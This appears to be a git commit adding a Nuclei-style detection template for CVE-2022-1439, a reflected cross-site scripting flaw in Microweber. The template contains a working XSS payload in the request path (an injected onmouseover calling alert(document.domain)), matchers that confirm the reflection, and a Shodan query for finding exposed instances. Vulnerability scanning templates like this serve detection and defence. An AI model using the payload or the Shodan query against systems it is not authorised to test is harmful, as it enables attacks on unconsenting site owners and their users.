Create CVE-2022-1504 (#4308)

* Create CVE-2022-1504.yaml * Added CVE-2022-1439 * removed additional template Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-05-06 05:56:54 -04:00 · 2022-05-06 05:56:54 -04:00 · cd3f64e0f5
parent ad5687b105
commit cd3f64e0f5
1 changed files with 33 additions and 0 deletions
--- a/cves/2022/CVE-2022-1439.yaml
+++ b/cves/2022/CVE-2022-1439.yaml
@ -0,0 +1,33 @@
+id: CVE-2022-1439
+
+info:
+  name: Microweber Reflected Cross-Site Scripting
+  author: pikpikcu
+  severity: medium
+  description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1439
+    - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
+  classification:
+    cve-id: CVE-2022-1439
+  metadata:
+    shodan-query: http.favicon.hash:780351152
+  tags: cve,cve2022,microweber,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "<div class='x module module-'onmouseover=alert(document.domain) '"
+          - "parent-module-id"
+        condition: and